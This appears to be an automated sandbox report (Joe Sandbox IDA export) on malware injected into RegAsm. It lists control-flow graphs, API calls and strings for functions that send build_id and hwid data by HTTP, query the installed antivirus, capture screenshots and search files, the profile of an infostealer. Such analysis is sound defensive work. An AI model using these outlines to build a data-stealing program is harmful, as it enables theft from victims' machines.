                                                                                                                                                                                                                                                    control_flow_graph 2490 404420-404512 call 40fd10 call 404350 call 40fcd0 * 5 call 40ff70 InternetOpenA StrCmpCA 2507 404514 2490->2507 2508 40451b-40451d 2490->2508 2507->2508 2509 404523-4046a1 call 411310 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fe00 call 40fdb0 call 40fd50 * 2 InternetConnectA 2508->2509 2510 404a88-404b17 InternetCloseHandle call 411240 * 2 call 40fd50 * 8 2508->2510 2509->2510 2581 4046a7-4046df HttpOpenRequestA 2509->2581 2582 4046e5-4046e9 2581->2582 2583 404a7b-404a85 InternetCloseHandle 2581->2583 2584 404701-404a13 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fcd0 call 40fe00 * 2 call 40fdb0 call 40fd50 * 2 call 40ff70 lstrlenA call 40ff70 * 2 lstrlenA call 40ff70 HttpSendRequestA InternetReadFile 2582->2584 2585 4046eb-4046fb InternetSetOptionA 2582->2585 2583->2510 2696 404a15-404a1a 2584->2696 2697 404a69-404a76 InternetCloseHandle call 40fd50 2584->2697 2585->2584 2696->2697 2699 404a1c-404a67 call 40fe90 call 40fdb0 call 40fd50 InternetReadFile 2696->2699 2697->2583 2699->2696 2699->2697
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044EA
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,015CF600,?,?,?,?,?,?,00000000), ref: 0040450A
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404694
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,015CF640,?,015D2480,00000000,00000000,-00400100,00000000), ref: 004046D5
                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004046FB
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,0041F9D9,?,?,?,004266BD,00000000,0041F9D9,?,00000000,0041F9D9,",00000000,0041F9D9,build_id), ref: 004049CA
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004049E3
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004049F4
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 00404A0B
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 00404A5F
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404A6A
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00404A7F
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404A89
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$FileHttpOpenReadRequestlstrcat$ConnectCrackOptionSend
                                                                                                                                                                                                                                                    • String ID: !$"$"$------$------$------$build_id$hwid
                                                                                                                                                                                                                                                    • API String ID: 1585128682-3346224549
                                                                                                                                                                                                                                                    • Opcode ID: da5d092444a3da03cc329f0cc45edc85e9aedb2fa1273bcdc78bbe44f71cf5a6
                                                                                                                                                                                                                                                    • Instruction ID: 25f5103656e4e74f10245afc0216cc85100445b82ed04830fef1478a7caee795
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da5d092444a3da03cc329f0cc45edc85e9aedb2fa1273bcdc78bbe44f71cf5a6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24224F75801248EADB15EBE4C956BEEBBB8AF14704F14407EE502735D2DA782B0CCB75
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6D35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 2706 6c6d35a0-6c6d35be 2707 6c6d38e9-6c6d38fb call 6c70b320 2706->2707 2708 6c6d35c4-6c6d35ed InitializeCriticalSectionAndSpinCount getenv 2706->2708 2710 6c6d38fc-6c6d390c strcmp 2708->2710 2711 6c6d35f3-6c6d35f5 2708->2711 2710->2711 2713 6c6d3912-6c6d3922 strcmp 2710->2713 2714 6c6d35f8-6c6d3614 QueryPerformanceFrequency 2711->2714 2715 6c6d398a-6c6d398c 2713->2715 2716 6c6d3924-6c6d3932 2713->2716 2717 6c6d374f-6c6d3756 2714->2717 2718 6c6d361a-6c6d361c 2714->2718 2715->2714 2721 6c6d3938 2716->2721 2722 6c6d3622-6c6d364a _strnicmp 2716->2722 2719 6c6d375c-6c6d3768 2717->2719 2720 6c6d396e-6c6d3982 2717->2720 2718->2722 2723 6c6d393d 2718->2723 2726 6c6d376a-6c6d37a1 QueryPerformanceCounter EnterCriticalSection 2719->2726 2720->2715 2721->2717 2724 6c6d3944-6c6d3957 _strnicmp 2722->2724 2725 6c6d3650-6c6d365e 2722->2725 2723->2724 2724->2725 2727 6c6d395d-6c6d395f 2724->2727 2725->2727 2728 6c6d3664-6c6d36a9 GetSystemTimeAdjustment 2725->2728 2729 6c6d37b3-6c6d37eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 2726->2729 2730 6c6d37a3-6c6d37b1 2726->2730 2731 6c6d36af-6c6d3749 call 6c70c110 2728->2731 2732 6c6d3964 2728->2732 2733 6c6d37ed-6c6d37fa 2729->2733 2734 6c6d37fc-6c6d3839 LeaveCriticalSection 2729->2734 2730->2729 2731->2717 2732->2720 2733->2734 2736 6c6d383b-6c6d3840 2734->2736 2737 6c6d3846-6c6d38ac call 6c70c110 2734->2737 2736->2726 2736->2737 2741 6c6d38b2-6c6d38ca 2737->2741 2742 6c6d38dd-6c6d38e3 2741->2742 2743 6c6d38cc-6c6d38db 2741->2743 2742->2707 2743->2741 2743->2742
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C75F688,00001000), ref: 6C6D35D5
                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6D35E0
                                                                                                                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 6C6D35FD
                                                                                                                                                                                                                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C6D363F
                                                                                                                                                                                                                                                    • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C6D369F
                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C6D36E4
                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6C6D3773
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75F688), ref: 6C6D377E
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75F688), ref: 6C6D37BD
                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6C6D37C4
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75F688), ref: 6C6D37CB
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75F688), ref: 6C6D3801
                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C6D3883
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C6D3902
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C6D3918
                                                                                                                                                                                                                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C6D394C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                                                                                                    • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                                                                                                                    • API String ID: 301339242-3790311718
                                                                                                                                                                                                                                                    • Opcode ID: cdac71db555954c5cc14f912ed0644b61ebfb9220c7324814ae7d6cf6155d432
                                                                                                                                                                                                                                                    • Instruction ID: 261f36677603b2365a910ec73c55019c92fa6a9d7d9d10d6a405515b2a941301
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cdac71db555954c5cc14f912ed0644b61ebfb9220c7324814ae7d6cf6155d432
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78B1A3B1B053109FDB08DF28C94465ABBF5FB8A704F45893EE899D7790DB34A904CB85
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 004173B0 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 198stringfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$wsprintf$FileFindFirstMatchPathSpec
                                                                                                                                                                                                                                                    • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                                    • API String ID: 3088078853-445461498
                                                                                                                                                                                                                                                    • Opcode ID: d6ef956874cba46caadd6ef42d6bdfaeaada442b11f1c12798f5b8139cb2197a
                                                                                                                                                                                                                                                    • Instruction ID: 74050b84c5968393980fbac4610b005297fc3338fa86757b47487a80d837938f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6ef956874cba46caadd6ef42d6bdfaeaada442b11f1c12798f5b8139cb2197a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8071A3B1904218ABCB11EFA5DC45EEE7B79BF49700F00459DF609A3180EB789A48CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00411BD0 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 211windowCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00411C0B
                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00411C8A
                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00411C97
                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00411C9E
                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00411CA7
                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411CB8
                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00411CC3
                                                                                                                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411CE3
                                                                                                                                                                                                                                                    • GlobalFix.KERNEL32(000000FF), ref: 00411D5D
                                                                                                                                                                                                                                                    • GlobalSize.KERNEL32(000000FF), ref: 00411D6A
                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00411DE9
                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00411E07
                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00411E0E
                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00411E16
                                                                                                                                                                                                                                                    • CloseWindow.USER32(00000000), ref: 00411E1D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Object$Window$CompatibleCreateDeleteGlobalSelect$BitmapCloseDesktopRectReleaseSizememset
                                                                                                                                                                                                                                                    • String ID: image/jpeg
                                                                                                                                                                                                                                                    • API String ID: 1311022706-3785015651
                                                                                                                                                                                                                                                    • Opcode ID: 10a6b00b6b32176d1bac6ac81ebad512e649f74969683a32fb64fb9b72728af4
                                                                                                                                                                                                                                                    • Instruction ID: ef9439ef4b553f0074f192a549a12381d2bb7864903823a1242f81823faaf454
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10a6b00b6b32176d1bac6ac81ebad512e649f74969683a32fb64fb9b72728af4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7712BB5900218AFDB10DFE4DD49BEEBBB9EF49704F10412EF905A3290D7785A05CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00416B50 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 155stringfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00416B8B
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00416BA2
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004274D0), ref: 00416BDC
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004274D4), ref: 00416BF6
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015CF750), ref: 00416C34
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015CF5A0), ref: 00416C48
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416C5C
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416C6A
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,004274D8), ref: 00416C7C
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416C90
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00416D31
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$FileFind$FirstNextwsprintf
                                                                                                                                                                                                                                                    • String ID: %s\%s
                                                                                                                                                                                                                                                    • API String ID: 111849568-4073750446
                                                                                                                                                                                                                                                    • Opcode ID: 09baf368a359633dd0045be9c58bda205bc519a21ad9d79a6b5fc8075b458cee
                                                                                                                                                                                                                                                    • Instruction ID: 528be017d5578f5195688f2f6504bfa294e083fd54127766ee02e1ea9f480e87
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09baf368a359633dd0045be9c58bda205bc519a21ad9d79a6b5fc8075b458cee
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C51B2B5900218ABDB14EBA0DC49BEE7B7CAF49700F00459EF615A3190D778AB48CFA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 004110A0 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 136comCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00427244,00000000,?,00000000,00000000), ref: 004110C3
                                                                                                                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427244), ref: 004110D4
                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00427AC0,00000000,00000001,004279F0,?,?,00000000,?,AV: ,00000000,?,00427244,00000000,?,00000000,00000000), ref: 004110EE
                                                                                                                                                                                                                                                    • CoSetProxyBlanket.OLE32(DrB,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427244,00000000), ref: 00411127
                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00411182
                                                                                                                                                                                                                                                      • Part of subcall function 004114B0: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,004111AB,?,?,00000000,?,AV: ,00000000,?,00427244,00000000,?,00000000), ref: 004114B8
                                                                                                                                                                                                                                                      • Part of subcall function 004114B0: CharToOemW.USER32(?,00000000), ref: 004114C5
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 004111BD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeVariant$AllocBlanketCharClearCreateInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                                                    • String ID: DrB$Select * From AntiVirusProduct$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                                                    • API String ID: 685420537-1356670634
                                                                                                                                                                                                                                                    • Opcode ID: ec3f8acdd729ef3e571e39e37bdeff58accda1093ba6b35922f2d883b294c8c5
                                                                                                                                                                                                                                                    • Instruction ID: c89cd2a0575ada332fe789c11e63fdd2cc2e56f72404bbf90223ea6bd3f95c21
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec3f8acdd729ef3e571e39e37bdeff58accda1093ba6b35922f2d883b294c8c5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94414B71B41229BBCB20DB85DC45FEFBB78EF49B50F10411AF605A7290C6789A01CBE8
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00401110 Relevance: 21.8, APIs: 8, Strings: 4, Instructions: 801fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00423334,?,00402025,?,00423330,?,00000000,00000000,?,00000000), ref: 00401376
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00423338,?,00000000), ref: 004013EC
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0042333C,?,00000000), ref: 00401406
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00423348,?,?,?,00423344,?,00402025,?,00423340,?,00000000), ref: 00401533
                                                                                                                                                                                                                                                      • Part of subcall function 00411530: SHGetFolderPathA.SHELL32(00000000,^iB,00000000,00000000,?,00000000), ref: 00411568
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
